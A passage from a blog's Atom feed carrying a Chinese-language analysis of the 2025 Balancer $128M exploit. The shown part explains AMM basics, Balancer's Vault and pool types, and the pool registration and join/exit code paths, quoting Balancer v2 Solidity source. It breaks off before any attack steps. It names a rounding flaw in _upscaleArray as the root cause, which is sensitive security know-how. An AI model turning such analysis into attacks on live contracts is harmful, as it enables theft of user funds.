<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>Kiprey&#39;s Blog</title>
  <icon>https://www.gravatar.com/avatar/e2da591d13645ac0fd960ab5cb2dede1</icon>
  
  <link href="https://kiprey.github.io/atom.xml" rel="self"/>
  
  <link href="https://kiprey.github.io/"/>
  <updated>2025-11-24T03:59:39.809Z</updated>
  <id>https://kiprey.github.io/</id>
  
  <author>
    <name>Kiprey</name>
    <email>Kiprey@qq.com</email>
  </author>
  
  <generator uri="https://hexo.io/">Hexo</generator>
  
  <entry>
    <title>Balancer 128M Exploit Analysis</title>
    <link href="https://kiprey.github.io/2025/11/balancer-128m-exploit-analysis/"/>
    <id>https://kiprey.github.io/2025/11/balancer-128m-exploit-analysis/</id>
    <published>2025-11-22T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.809Z</updated>
    
    <content type="html"><![CDATA[<div class="lang-switcher" style="text-align: center; margin: 20px 0;">  <button id="lang-zh" onclick="switchLang('zh')" style="padding: 8px 16px; margin: 0 5px; background: #007bff; color: white; border: none; border-radius: 4px; cursor: pointer;">中文</button>  <button id="lang-en" onclick="switchLang('en')" style="padding: 8px 16px; margin: 0 5px; background: #6c757d; color: white; border: none; border-radius: 4px; cursor: pointer;">English</button></div><div id="content-zh" class="lang-content lang-content-zh" style="display: block;"><h2 id="一、简介">一、简介</h2><p><strong>2025年11月3日，攻击者利用 balancer 池不变式计算中的算术精度损失，在不到 30 分钟的时间内，从六个区块链网络中窃取了 1.28 亿美元。</strong> 我对这个攻击非常感兴趣，但是现有的网上的文章大多在描述极其有限的技术细节，例如 _upscaleArray 相关逻辑的精度丢失又或者是相邻一两层的调用链，对于尚未了解过 balancer 具体细节的读者不太友好。因此想好好整理一下全部相关细节并趁机学习一下 balancer 协议。</p><span id="more"></span><h2 id="二、Balancer-Internal">二、Balancer Internal</h2><p>一句话：Balancer 是以 <strong>自动做市商（AMM）</strong> 为核心的一个 DeFi 流动性池框架。是不是感觉说了和没说没什么两样，别担心，我们一步步来理解。</p><h3 id="1-什么是-AMM">1. 什么是 AMM</h3><p>什么是自动做市商 AMM？我们先了解一下什么是做市商，<strong>做市商 Market Maker 是一个用于提供流动性的角色</strong>。例如在股票交易中，如果某个标的的买价 bid 和卖价 ask 之间相差巨大，那么这不利于用户进行买卖，因为差价较大会导致交易不到合适的价格进而造成额外的资金损失。而做市商就会通过在订单簿中高频挂单提供流动性，来减少买卖价格的差距。如果你玩过美股期权，那你就尤为能体会到这一点，因为期权的特殊性，其流动性会比较糟糕，因此大部分买卖池里的流动性都是做市商提供的。</p><p>而对于加密货币来说，货币转换也会遇到类似的问题。如果用户希望能大额买卖自己的代币，那么需要找到一个能吃下自己所有交易的地方。熟为人知的 Uniswap-V2 就是一个比较经典的地方，它这里持有了大量的 TokenA/TokenB 代币对，并且通过维持 <code>x * y = k</code> 不变量来计算代币兑换价格。例如假如 Uniswap 的 k = 20,000，且当前持有了 1000 USDC 和 20 ETH，则 ETH/USDC 兑换价格为 50。而如果 Uniswap 里持有的代币数量变成了 2000 USDC 和 10 ETH （注意k不变），则 ETH/USDC 兑换价格就变成了 200。你可以看到像 Uniswap 这种交易场所，其交易价格会随着数学公式的计算来自动变换，因此是自动的做市商。<strong>自动做市商就是既能自动根据市场情况来变幻价格，又能为用户提供充足的代币流动性来满足交易需求的一个角色</strong>。</p><h3 id="2-Balancer-组件">2. Balancer 组件</h3><p><a href="https://docs-v2.balancer.fi/concepts/pools/">Balancer-v2 文档</a>里描述了 Balancer  主要由两部分组成：Vault 和 Pools。Vault 和 Pools 是一对多的关系，因此如果用户涉及到多个代币之间的交易操作，则只需要在 Vault 里变动记帐即可，减少重复的转账，降低 gas 费用。</p><p><strong>Vault</strong></p><p>Vault（pkg/vault/contracts/Vault.sol） 是 Balancer 的核心，它<strong>持有</strong>和<strong>管理</strong>每个 Balancer 池中的所有代币，也是大多数 Balancer 操作（swaps / joins / exits）的入口。但是需要注意的是 Vault 持有代币和记账，但是它不进行具体的资金管理（例如维护 AMM 不变量等逻辑就不在 vault 里做），这部分逻辑则在 Pools 里进行。</p><p><strong>Pools</strong></p><p>Balancer 里有很多种不同类型的 pool，这里简单介绍几种比较简单或常用的：</p><ul><li><strong>Linear Pool</strong>：其使用已知且稳定的汇率，让基础资产与其包装后的收益代币进行兑换。例如，在 Aave 中，稳定币 DAI 与将其存入 Aave 后所获得的、代表存款并持续累积利息的 aDAI 之间，就可以通过 Linear Pool 实现高效互换。</li><li><strong>Weight Pool:</strong> 对 Uniswap V1 所推广的经典恒定乘积做市模型（x · y = k）的扩展版本。</li><li><strong>Composable Stable Pools</strong>: 面向一组价值高度相关、预期能以近 1:1 或通过已知汇率实现稳定兑换的资产所设计的流动性池。例如 USDC、USDT、DAI 等稳定币之间的交易，它们的价格波动极小，因此非常适合用低滑点的稳定性曲线进行撮合。</li></ul><p>对于 <strong>Composable Stable Pools</strong>，需要注意的是：</p><ol><li>这类场景与 Linear Pool 的目标并不同：Composable Stable Pool 处理的是“<strong>多个相互等价的稳定资产</strong>”之间的兑换，而 Linear Pool 处理的是“<strong>基础资产与其收益代币</strong>”之间的兑换，两者的数学结构和应用场景均有显著差异。</li><li>Composable 表示该池的 BPT（Balancer Pool Token，即流动性提供者在向池中存入资产后所收到的 ERC20 份额证明）<strong>本身可以作为一种可组合的资产参与其它池子的构建</strong>，也就是说池子的 LP 代币能够像普通代币一样被继续嵌套进更高层级的池，从而使不同池子之间能够自由组合、互相引用，并共同形成更大规模、更高资本效率的流动性结构。虽然 Linear Pool 也会将自身的 BPT 注册到 Vault 中，但这些 BPT 可能并不会被当作可组合资产用于构建其他 Pool。</li></ol><h3 id="3-Balancer-交互流程">3. Balancer 交互流程</h3><p>这里我们以 Vault + Composable Stable Pools 组合为例来介绍一下 Balancer 的一些交互流程。</p><p><strong>创建 Composable Stable Pools 合约</strong></p><p>我们先来看看当创建一个 pool 时，vault 和 pool 之间会有什么样的交互流程以及涉及到的状态变量：</p><ol><li><p>若想创建一个新的 <strong>Composable Stable Pool</strong> 时，用户可以自由调用 ComposableStablePoolFactory (pkg/pool-stable/contracts/ComposableStablePoolFactory.sol) 合约的 create 函数来创建出新的 ComposableStablePool 合约。</p></li><li><p>ComposableStablePool 的 constructor 接下来则会自动调用 vault.registerPool 和 vault.registerTokens 将本 pool 以及相关 token 注册进 vault 中。需要注意的是这里的相关 token 除了注册时指定的底层资产以外，还会包含 pool 地址本身（因为 pool 本身就是它自己的 BPT）。</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="title function_">constructor</span>(<span class="params">NewPoolParams memory params</span>)</span><br><span class="line">    <span class="title class_">BasePool</span>(</span><br><span class="line">        params.<span class="property">vault</span>,</span><br><span class="line">        <span class="title class_">IVault</span>.<span class="property">PoolSpecialization</span>.<span class="property">GENERAL</span>,</span><br><span class="line">        params.<span class="property">name</span>,</span><br><span class="line">        params.<span class="property">symbol</span>,</span><br><span class="line">        <span class="title function_">_insertSorted</span>(params.<span class="property">tokens</span>, <span class="title class_">IERC20</span>(<span class="variable language_">this</span>)), <span class="comment">// &lt;------</span></span><br><span class="line">        <span class="keyword">new</span> address[](params.<span class="property">tokens</span>.<span class="property">length</span> + <span class="number">1</span>), <span class="comment">// &lt;------</span></span><br><span class="line">        params.<span class="property">swapFeePercentage</span>,</span><br><span class="line">        params.<span class="property">pauseWindowDuration</span>,</span><br><span class="line">        params.<span class="property">bufferPeriodDuration</span>,</span><br><span class="line">        params.<span class="property">owner</span></span><br><span class="line">    )</span><br><span class="line">    <span class="title class_">StablePoolAmplification</span>(params.<span class="property">amplificationParameter</span>)</span><br><span class="line">    <span class="title class_">ComposableStablePoolStorage</span>(<span class="title function_">_extractStorageParams</span>(params))</span><br><span class="line">    <span class="title class_">ComposableStablePoolRates</span>(<span class="title function_">_extractRatesParams</span>(params))</span><br><span class="line">    <span class="title class_">ProtocolFeeCache</span>(</span><br><span class="line">        params.<span class="property">protocolFeeProvider</span>,</span><br><span class="line">        <span class="title class_">ProviderFeeIDs</span>(&#123; <span class="attr">swap</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">SWAP</span>, <span class="attr">yield</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">YIELD</span>, <span class="attr">aum</span>: <span class="title class_">ProtocolFeeType</span>.<span class="property">AUM</span> &#125;)</span><br><span class="line">    )</span><br><span class="line">&#123;</span><br><span class="line">    _version = params.<span class="property">version</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/lib/PoolRegistrationLib.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    IVault vault,</span></span><br><span class="line"><span class="params">    IVault.PoolSpecialization specialization,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) private <span class="title function_">returns</span> (bytes32) &#123;</span><br><span class="line">    bytes32 poolId = vault.<span class="title function_">registerPool</span>(specialization);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We don&#x27;t need to check that tokens and assetManagers have the same length, since the Vault already performs</span></span><br><span class="line">    <span class="comment">// that check.</span></span><br><span class="line">    vault.<span class="title function_">registerTokens</span>(poolId, tokens, assetManagers);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里提一嘴这个 <strong>PoolSpecialization</strong>，它决定了 Vault 在调用 pool 进行 swap 时所采用的 callback 接口形式，从而影响池子的 gas 成本与可支持的功能范围：</p><ul><li>General 类型最灵活，适用于需要访问全部 token 余额和复杂数学逻辑的池。</li><li>Minimal Swap Info 则在保证功能性的同时减少回调数据量，常用于 Weight Pool 这类不需要全面状态的 AMM。</li><li>Two Token 则进一步将池子限制为仅包含两个资产，以换取最低的 swap gas 成本。</li></ul><p>不同类型的池根据自身 invariant 的计算需求和预期的 swap 复杂度，会选择适合的 specialization 来平衡功能与性能。每个 pool 在 constructor 时就会写死 PoolSpecialization 参数，在 ComposableStablePool 中 PoolSpecialization 就被设置为 <strong>GENERAL</strong>。</p></li><li><p>Vault 这边在收到 General Pool 的函数调用时会做一些计算和状态更新。一个是在 registerPool 函数中 vault 会为这个 pool 计算一个独一无二的 pool ID 并存入 _isPoolRegistered 变量中：</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolRegistry.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerPool</span>(<span class="params">PoolSpecialization specialization</span>)</span><br><span class="line">    external</span><br><span class="line">    override</span><br><span class="line">    nonReentrant</span><br><span class="line">    whenNotPaused</span><br><span class="line">    <span class="title function_">returns</span> (bytes32)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="comment">// Each Pool is assigned a unique ID based on an incrementing nonce. This assumes there will never be more than</span></span><br><span class="line">    <span class="comment">// 2**80 Pools, and the nonce will not overflow.</span></span><br><span class="line"></span><br><span class="line">    bytes32 poolId = <span class="title function_">_toPoolId</span>(msg.<span class="property">sender</span>, specialization, <span class="title function_">uint80</span>(_nextPoolNonce));</span><br><span class="line"></span><br><span class="line">    <span class="title function_">_require</span>(!_isPoolRegistered[poolId], <span class="title class_">Errors</span>.<span class="property">INVALID_POOL_ID</span>); <span class="comment">// Should never happen as Pool IDs are unique.</span></span><br><span class="line">    _isPoolRegistered[poolId] = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line">    _nextPoolNonce += <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note that msg.sender is the pool&#x27;s contract</span></span><br><span class="line">    emit <span class="title class_">PoolRegistered</span>(poolId, msg.<span class="property">sender</span>, specialization);</span><br><span class="line">    <span class="keyword">return</span> poolId;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>另一个是在 registerTokens 函数中分别设置 <code>_poolAssetManagers</code> 和 <code>_generalPoolsBalances</code>。这俩函数都是用 <code>&lt;poolId, token&gt;</code> 来作为 key 去存数据，前者表示能够操纵 Pool 内某 token 的存入/提取/设置余额的管理员地址，后者表示 Pool 内某 token 在 vault 这边的<strong>余额状态</strong>。因此可以在这里看到确实是 vault 来保存 Pool 里存放的各个 token 的数量情况，这也便于 swap 交换。</p> <figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/PoolTokens.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">registerTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    IERC20[] memory tokens,</span></span><br><span class="line"><span class="params">    address[] memory assetManagers</span></span><br><span class="line"><span class="params"></span>) external override nonReentrant whenNotPaused <span class="title function_">onlyPool</span>(<span class="params">poolId</span>) &#123;</span><br><span class="line">    <span class="title class_">InputHelpers</span>.<span class="title function_">ensureInputLengthMatch</span>(tokens.<span class="property">length</span>, assetManagers.<span class="property">length</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Validates token addresses and assigns Asset Managers</span></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="title class_">IERC20</span> token = tokens[i];</span><br><span class="line">        <span class="title function_">_require</span>(token != <span class="title class_">IERC20</span>(<span class="number">0</span>), <span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line"></span><br><span class="line">        _poolAssetManagers[poolId][token] = assetManagers[i];</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="title class_">PoolSpecialization</span> specialization = <span class="title function_">_getPoolSpecialization</span>(poolId);</span><br><span class="line">    <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">TWO_TOKEN</span>) &#123;</span><br><span class="line">        <span class="title function_">_require</span>(tokens.<span class="property">length</span> == <span class="number">2</span>, <span class="title class_">Errors</span>.<span class="property">TOKENS_LENGTH_MUST_BE_2</span>);</span><br><span class="line">        <span class="title function_">_registerTwoTokenPoolTokens</span>(poolId, tokens[<span class="number">0</span>], tokens[<span class="number">1</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (specialization == <span class="title class_">PoolSpecialization</span>.<span class="property">MINIMAL_SWAP_INFO</span>) &#123;</span><br><span class="line">        <span class="title function_">_registerMinimalSwapInfoPoolTokens</span>(poolId, tokens);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// PoolSpecialization.GENERAL</span></span><br><span class="line">        <span class="title function_">_registerGeneralPoolTokens</span>(poolId, tokens); <span class="comment">// &lt;-------</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    emit <span class="title class_">TokensRegistered</span>(poolId, tokens, assetManagers);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/vault/contracts/balances/GeneralPoolsBalance.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_registerGeneralPoolTokens</span>(<span class="params">bytes32 poolId, IERC20[] memory tokens</span>) internal &#123;</span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[poolId];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokens.<span class="property">length</span>; ++i) &#123;</span><br><span class="line">        <span class="comment">// EnumerableMaps require an explicit initial value when creating a key-value pair: we use zero, the same</span></span><br><span class="line">        <span class="comment">// value that is found in uninitialized storage, which corresponds to an empty balance.</span></span><br><span class="line">        bool added = poolBalances.<span class="title function_">set</span>(tokens[i], <span class="number">0</span>);</span><br><span class="line">        <span class="title function_">_require</span>(added, <span class="title class_">Errors</span>.<span class="property">TOKEN_ALREADY_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>说到这里就不得不提 <code>Pool Balances</code> 在 vault 里的数据保存形式。<code>_generalPoolsBalances</code>  里为每个 pool 在某个 token 上保存的余额信息是以 bytes32 来表示，其中包含了三个字段：</p><ul><li><code>cash</code> 112bits，表示该 Pool 当前存放在 Vault 内的代币数量</li><li><code>managed</code> 112bits，表示由 Pool 的 Asset Manager 从 Vault 中提走并在外部托管的代币数量</li><li><code>lastChangeBlock</code> 32bits，表示上一次余额变动时的区块号，防止三明治攻击用的</li></ul><p>这个设计的核心目的是在保持 AMM 正常运作的同时，让流动性能够获得更高的收益。在早期的 Uniswap 模型中，为了维持 x·y = k，不得不把绝大部分流动性都锁在合约内部，从而无法进行任何外部投资，也就不能产生额外收益。而 Balancer 的架构允许通过 Asset Manager 将部分资金从 Vault 中划出，用于借贷、投资或执行其他收益策略。这样 Pool 的总余额依然等于 <code>total = cash + managed</code>，但其中的 managed 部分能够被灵活利用来赚取额外收益；只有当发生 swap、join 或 exit 等事件时，才会更新存放在 Vault 内的 <code>cash</code> 数量。这样既保证了 AMM 的可用性，又提高了整体资金效率。</p></li></ol><p><strong>注入流动性</strong></p><p>当 Liquidity Provider (LP) 想为 Pool 添加流动性时，LP 可以通过调用 vault 上的 joinPool 函数来注资。vault.joinPool 函数会调用具体的 pool 的 onJoinPool 函数（退出流动性则分别调用 vault.exitPool 和 pool.onExitPool 函数）。以下是 onJoinPool  / onExitPool 函数的代码，可以看出来这俩是会被所有类型的 Pool 给继承，具体<strong>不同类型的 Pool 则分别实现不同的 _onInitializePool / _onJoinPool / _onExitPool 此类 hook 函数来计算资金流入流出的数额，但 BPT 的铸造和销毁是在这里</strong>：</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-utils/contracts/BasePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for adding liquidity to a pool (including the first time, &quot;initializing&quot; the pool).</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `joinPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onJoinPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">    uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_">totalSupply</span>() == <span class="number">0</span>) &#123;</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onInitializePool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// On initialization, we lock _getMinimumBpt() by minting it for the zero address. This BPT acts as a</span></span><br><span class="line">        <span class="comment">// minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the</span></span><br><span class="line">        <span class="comment">// Pool from ever being fully drained.</span></span><br><span class="line">        <span class="title function_">_require</span>(bptAmountOut &gt;= <span class="title function_">_getMinimumBpt</span>(), <span class="title class_">Errors</span>.<span class="property">MINIMUM_BPT</span>);</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(<span class="title function_">address</span>(<span class="number">0</span>), <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut - <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onJoinPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for removing liquidity from a pool.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `exitPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onExitPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    uint256[] memory amountsOut;</span><br><span class="line">    uint256 bptAmountIn;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// When a user calls `exitPool`, this is the first point of entry from the Vault.</span></span><br><span class="line">    <span class="comment">// We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit</span></span><br><span class="line">    <span class="comment">// mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally</span></span><br><span class="line">    <span class="comment">// should always work, even if the Pool&#x27;s mathematics or a dependency break down.</span></span><br><span class="line">    <span class="keyword">if</span> (userData.<span class="title function_">isRecoveryModeExitKind</span>()) &#123;</span><br><span class="line">        <span class="comment">// This exit kind is only available in Recovery Mode.</span></span><br><span class="line">        <span class="title function_">_ensureInRecoveryMode</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note that we don&#x27;t upscale balances nor downscale amountsOut - we don&#x27;t care about scaling factors during</span></span><br><span class="line">        <span class="comment">// a recovery mode exit.</span></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_doRecoveryModeExit</span>(balances, <span class="title function_">totalSupply</span>(), userData);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// Note that we only call this if we&#x27;re not in a recovery mode exit.</span></span><br><span class="line">        <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">        uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line"></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_onExitPool</span>(</span><br><span class="line">            